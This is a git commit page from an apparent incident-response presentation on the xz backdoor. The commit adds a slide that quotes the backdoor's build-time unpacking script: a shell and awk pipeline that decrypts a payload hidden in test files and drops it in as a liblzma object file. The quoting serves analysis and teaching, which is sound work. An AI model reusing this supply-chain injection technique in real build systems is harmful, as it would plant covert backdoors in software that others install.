my only contributionmagister

author: chramb <79099832+chramb@users.noreply.github.com> 2024-06-13 18:03:32 +0200
committer: chramb <79099832+chramb@users.noreply.github.com> 2024-06-13 18:03:32 +0200
commit: d1dec8cd5a7b9b6943a72e1992a9b78688533956 (patch)
tree: 4142fb9db5423f16a264bb7f53a4e8b2d4a9a236 /incident-response-xz.vrb
parent: 38388dbc30d15e3540e72d31d1748dd13858d2dd (diff)
download: AGH-xz-backdoor-presentation-d1dec8cd5a7b9b6943a72e1992a9b78688533956.tar.gz
AGH-xz-backdoor-presentation-d1dec8cd5a7b9b6943a72e1992a9b78688533956.zip
1 files changed, 9 insertions, 0 deletions
diff --git a/incident-response-xz.vrb b/incident-response-xz.vrb
new file mode 100644
index 0000000..466f069
--- /dev/null
+++ b/incident-response-xz.vrb
@@ -0,0 +1,9 @@
+\frametitle{Backdoor unpacking}
+\ttfamily\small
+  \begin{lstlisting}[breaklines]
+xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<4096;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | xz -dc --single-stream | ((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o || true
+if ! test -f liblzma_la-crc64-fast.o; then
+exit 0
+fi
+cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true
+  \end{lstlisting}
author	chramb <79099832+chramb@users.noreply.github.com>	2024-06-13 18:03:32 +0200
committer	chramb <79099832+chramb@users.noreply.github.com>	2024-06-13 18:03:32 +0200
commit	d1dec8cd5a7b9b6943a72e1992a9b78688533956 (patch)
tree	4142fb9db5423f16a264bb7f53a4e8b2d4a9a236 /incident-response-xz.vrb
parent	38388dbc30d15e3540e72d31d1748dd13858d2dd (diff)
download	AGH-xz-backdoor-presentation-d1dec8cd5a7b9b6943a72e1992a9b78688533956.tar.gz AGH-xz-backdoor-presentation-d1dec8cd5a7b9b6943a72e1992a9b78688533956.zip